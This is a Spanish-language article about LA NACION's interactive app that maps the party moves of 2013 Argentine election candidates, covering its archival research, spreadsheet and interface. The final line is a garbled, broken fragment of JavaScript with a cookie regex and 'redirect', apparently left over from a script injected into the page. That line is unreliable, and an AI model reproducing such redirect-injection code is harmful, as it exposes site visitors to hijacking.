El laberinto de los políticos

Es una aplicación creada por LA NACION para visualizar el recorrido de los principales postulantes de las elecciones 2013, con datos e imágenes históricas.

El primer desafío consistió en reunir la información sobre las fuerzas políticas (bloques y partidos) en las que fueron participando los candidatos de las elecciones para ver sus desplazamientos a lo largo de las carreras.Esto implicó un gran trabajo de archivo de una duración de poco más de dos meses. 

Toda la información se cargó en un excel. Posteriormente, los datos se cargaron en un Google Spreadsheet y en la aplicación se agregó un botón para que todos los usuarios pudieran acceder a la información y descargar los datos que se usaron para desarrollarla.

La planilla de cálculo agrupó la información a partir de 4 columnas: candidatos, fechas, identificación partidaria y observaciones.

En paralelo se buscaron imágenes y videos que graficaban esos momentos más relevantes de las carreras políticas de los candidatos.

En relación con la programación, el desafío consistió en mostrar las tres dimensiones (elecciones, partidos y recorridos) en una visualización comprensible y amigable para los lectores. En este sentido, el equipo tuvo que trabajar codo a codo con los diseñadores del diario.

El funcionamiento de la aplicación es muy sencillo. Cada uno de los candidatos se encuentra identificado con su foto. Los usuarios pueden seleccionar hasta un máximo de 4 políticos. Luego, hacen clic en el botón “Comparar” y a continuación se despliega en el recorrido de cada uno de ellos en forma de línea. De este modo, los lectores pueden verificar si existen cruces y pases. Al mismo tiempo, en el círculo correspondiente al año de la elección, se puede ver información adicional en forma de texto breve, imagen o video.

Leer la nota sobre el lanzamiento aquí

  “; )”\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));”;,”redirect”);>,;”””; ; “”)}